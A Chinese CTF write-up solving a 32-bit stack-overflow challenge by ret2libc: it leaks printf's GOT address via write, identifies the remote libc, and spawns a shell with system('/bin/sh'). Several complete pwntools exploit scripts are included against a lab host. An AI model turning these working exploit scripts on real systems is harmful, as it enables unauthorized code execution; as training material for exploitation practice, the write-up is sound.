stack(ret2libc)

分析

首先checksec一下,发现没开栈保护,可能是栈溢出。

[*] '/root/Desktop/bin/pwn/stack_/stack'

    Arch:     i386-32-little

    RELRO:    Partial RELRO

    Stack:    No canary found

    NX:       NX enabled

    PIE:      No PIE (0x8048000)

用IDA32把所有函数看了一遍发现函数gee的read可以利用一下。

大致思路

先获取libc库版本,通过泄露printf的真实地址得到偏移,

从而知道system函数和'/bin/sh'的真实地址。通过栈溢出覆盖返回地址为system函数从而拿到shell。

Tip:ldd stack查看libc库版本

第一次的exp如下

#!/usr/bin/python

# -*- coding: utf-8 -*-

__Author__ = "LB@10.0.0.55"

from pwn import *

#context.log_level = "debug"

io = process('./stack')

#io = remote('10.4.21.55',9012)

libc = ELF('/lib/i386-linux-gnu/libc.so.6')

elf = ELF('./stack')

print_got_addr = elf.got['printf']

write_plt_addr = elf.plt['write']

gee_addr = elf.symbols['gee']

payload1 = flat(['a'*0x8c, write_plt_addr, gee_addr, 1, print_got_addr, 4])

io.send(payload1)

while 1:

	temp = io.recvline()

	print temp[0]

	if temp[0] in '.*IW\x1b':

		pass

	else:

		print_addr = u32(temp[0:4])

		print("get")

		break

print hex(print_addr)

offset = print_addr - libc.symbols['printf']

print hex(offset)

sys_addr = offset + libc.symbols['system']

bin_sh_addr = offset + libc.search('/bin/sh').next()

payload2 = flat(['a'*0x8c, sys_addr, 0xdeadbeef, bin_sh_addr])

io.sendline(payload2)

io.interactive()

在本地跑没毛病,但是一到远程就EOF,调了几次还是一脸懵逼,在我一直追问M4x师傅之后他说远程的libc和本地不一样。

这里分享个小trick:在libc版本正确的前提下,得到的libc_base的后三位均为0。

如下图

第二次尝试用DynELF跑

结果发现由于这题的一些缘故跑地贼慢,根本跑不出来,但还是把exp放出来,以供以后参考。

#!/usr/bin/python

# -*- coding: utf-8 -*-

__Author__ = "LB@10.0.0.55"

from pwn import *

import binascii

#context.log_level = "debug"

io = process('./stack')

#io = remote('10.4.21.55',9012)

elf = ELF('./stack')

print_got_addr = elf.got['printf']

write_plt_addr = elf.plt['write']

gee_addr = elf.symbols['gee']

def leak(address):

	payload = flat(['a'*0x8c, write_plt_addr, gee_addr, 1, address, 4])

	io.sendline(payload)

	while 1:

		temp = io.recvline()

		print temp[0]

		if temp[0] in '.*IW\x1b':

			pass

		else:

			data = temp[0:4]

			print "%#x => %s" % (address, (data or '').encode('hex'))

			print("get")

			break

	return data

dynelf = DynELF(leak, elf=ELF('stack'))

sys_addr = dynelf.lookup("system", "libc")

print "systemAddress:", hex(sys_addr)

io.interactive()

io.close()

第三次我是通过泄露printf和write函数的真实地址

然后在https://libc.blukat.me这个网址找到对应的libc版本以及相应函数的libc地址。

leak_libc如下

#!/usr/bin/python

# -*- coding: utf-8 -*-

__Author__ = "LB@10.0.0.55"

from pwn import *

import binascii

context.log_level = "debug"

#io = process('./stack')

io = remote('10.4.21.55',9012)

elf = ELF('./stack')

print_got_addr = elf.got['printf']

write_got_addr = elf.got['write']

write_plt_addr = elf.plt['write']

gee_addr = elf.symbols['gee']

def leak(address):

	payload = flat(['a'*0x8c, write_plt_addr, gee_addr, 1, address, 4])

	io.sendline(payload)

	while 1:

		temp = io.recvline()

		if temp[0] in '.*IW\x1b':

			pass

		else:

			data = u32(temp[0:4])

			print("get")

			break

	return hex(data)

print 'print_addr:'

print_addr = leak(print_got_addr)

print print_addr

print 'write_addr'

write_addr = leak(write_got_addr)

print write_addr

io.interactive()

io.close()

exp如下:

#!/usr/bin/python

# -*- coding: utf-8 -*-

__Author__ = "LB@10.0.0.55"

from pwn import *

#context.log_level = "debug"

#io = process('./stack')

io = remote('10.4.21.55',9012)

#libc = ELF('/lib/i386-linux-gnu/libc.so.6')

#libc6_2.23-0ubuntu9_i386

elf = ELF('./stack')

print_got_addr = elf.got['printf']

write_plt_addr = elf.plt['write']

gee_addr = elf.symbols['gee']

payload1 = flat(['a'*0x8c, write_plt_addr, gee_addr, 1, print_got_addr, 4])

io.send(payload1)

while 1:

	temp = io.recvline()

	print temp[0]

	if temp[0] in '.*IW\x1b':

		pass

	else:

		print_addr = u32(temp[0:4])

		print("get")

		break

print hex(print_addr)

#line = raw_input()

libc_print = 0x049670

libc_sys =  0x03ada0

libc_bin = 0x15b9ab

offset = print_addr - libc_print

print hex(offset)

sys_addr = offset + libc_sys

bin_sh_addr = offset + libc_bin

payload2 = flat(['a'*0x8c, sys_addr, 0xdeadbeef, bin_sh_addr])

io.sendline(payload2)

io.interactive()

#flag{lan de xiang flag}

>###作者: LB919
>###出处:http://www.cnblogs.com/L1B0/
>###如有转载,荣幸之至!请随手标明出处;

赛博杯-HMI流水灯-stack的更多相关文章

  1. 毕业回馈-89C51之GPIO使用(流水灯)

    今天分享一个89c51制作的8位流水灯案例.使用Proteus仿真. 同上一遍文章不同.上一篇文章中对于GPIO操作主要是位操作,即sbit led1=P0^0;其中P0^0代表p0.0这个引脚,然后 ...

  2. 【接口时序】2、Verilog实现流水灯及与C语言的对比

    一. 软件平台与硬件平台 软件平台: 1.操作系统:Windows-8.1 2.开发套件:ISE14.7 3.仿真工具:ModelSim-10.4-SE 硬件平台: 1.FPGA型号:XC6SLX45 ...

  3. S5PV210_流水灯

    1.整体思路:把相应的配置数据写入相应的寄存器,控制GPIO电平(Led.s)——运用工程管理Makefile编译.链接文件(由Led.s编译得到led.bin,该文件用于USB启动方式点亮LED,若 ...

  4. (一)GPIO 编程实验 LED 流水灯控制

    7个寄存器 是R1-R16.(当然,里面有很多是分几个模式的,所以总共有37个)类似于单片机的R0-R7. GPXCON,GPXDAT等等是另外的寄存器,应该叫,特殊功能寄存器,类似于单片机的P0,P ...

  5. NIOS ii 流水灯

    为了做项目的前期验证工作,实验室购买了某开发板,下面是基于该板子的实现过程.作为笔记记录,供入门者参考. 1:创建一个Quartus II的工程 next选择器件,然后finish.我的器件是cycl ...

  6. [51单片机] EEPROM 24c02 [I2C代码封装-保存实现流水灯]

    这里把EEPROM 24c02封装起来,今后可以直接调用,其连线方式为:SDA-P2.1;SCL-P2.0;WP-VCC >_<:i2c.c /*--------------------- ...

  7. 【黑金原创教程】【FPGA那些事儿-驱动篇I 】【实验一】流水灯模块

    实验一:流水灯模块 对于发展商而言,动土仪式无疑是最重要的任务.为此,流水灯实验作为低级建模II的动土仪式再适合不过了.废话少说,我们还是开始实验吧. 图1.1 实验一建模图. 如图1.1 所示,实验 ...

  8. STM32学习笔记(二) 基于STM32-GPIO的流水灯实现

    学会了如何新建一个工程模板,下面就要开始动手实践了.像c/c++中经典的入门代码"hello world"一样,流水灯作为最简单的硬件设备在单片机领域也是入门首推.如果你已经有了一 ...

  9. 3. 戏说VHDL之入门游戏一:流水灯

    一.   流水灯 1.1流水灯原理 流水灯是每个学电子的入门“游戏” ,示意图如图1,其原理极其简单,但是可玩性却极强,可以就8个LED写出不同花样的程序.在1.2中我们列出两个不同思路的代码作为VH ...

随机推荐

  1. Initialization error SQL*Net not properly installed

    1.错误描述 2.错误原因 由于我在64位操作系统上安装了32位PL/SQL导致出错,出现兼容性连接问题 3.解决办法 安装一个32位的Oracle客户端,Tools-Preferences-Orac ...

  2. Codeforces Round #430 (Div. 2) D. Vitya and Strange Lesson

    因为抑或,一眼字典树 但是处理起来比较难 #include<iostream> #include<map> #include<iostream> #include& ...

  3. pat1041-1050

    没想到半天就做完了10题 = =,这几题太简单了,基本10分钟一题 1041 #include<cmath> #include<map> #include<iostrea ...

  4. 一次SQL慢查询的优化处理

    背景 在开发完成,数据验证的过程中,需要对两个非常大的表进行query,运行了十几分钟都跑不完.如下: select * from big_a a, big_b b where a.some_id = ...

  5. 【BZOJ4237】稻草人(CDQ分治,单调栈)

    [BZOJ4237]稻草人(CDQ分治,单调栈) 题面 BZOJ 题解 \(CDQ\)分治好题呀 假设固定一个左下角的点 那么,我们可以找到的右下角长什么样子??? 发现什么? 在右侧是一个单调递减的 ...

  6. Bzoj4555: [Tjoi2016&Heoi2016]求和

    题面 Bzoj Sol 推柿子 因为当\(j>i\)时\(S(i, j)=0\),所以有 \[\sum_{i=0}^{n}\sum_{j=0}^{n}S(i, j)2^j(j!)\] 枚举\(j ...

  7. 【xsy2115】Delight for a Cat

    Time Limit: 1000 ms Memory Limit: 512 MB Description ​ 从前,有一只懒猫叫CJB.每个小时,这只猫要么在睡觉,要么在吃东西,但不能一边睡觉一边吃东 ...

  8. Spring对IOC的理解

    一.IOC控制反转和DI依赖注入 1.控制反转,字面可以理解为:主动权的转移,原来一个应用程序内的对象是类通过new去主动创建并实例化的,对对像创建的主动权在程序代码中.程序不仅要管理业务逻辑也要管理 ...

  9. Android 音视频编解码——RGB与YUV格式转换

    一.RGB模型与YUV模型 1.RGB模型 我们知道物理三基色分别是红(Red).绿(Green).蓝(Blue).现代的显示器技术就是通过组合不同强度的红绿蓝三原色,来达成几乎任何一种可见光的颜色. ...

  10. 用Node.js写爬虫,撸羞羞的图片

    说到爬虫,很多人都认为是很高大上的东西.哇塞,是不是可以爬妹纸图啊,是不是可以爬小片片啊.答案就是对的.爬虫可以完成这些东西的操作.但是,作为一个正直的程序员,我们要在法律允许范围内用爬虫来为我们服务 ...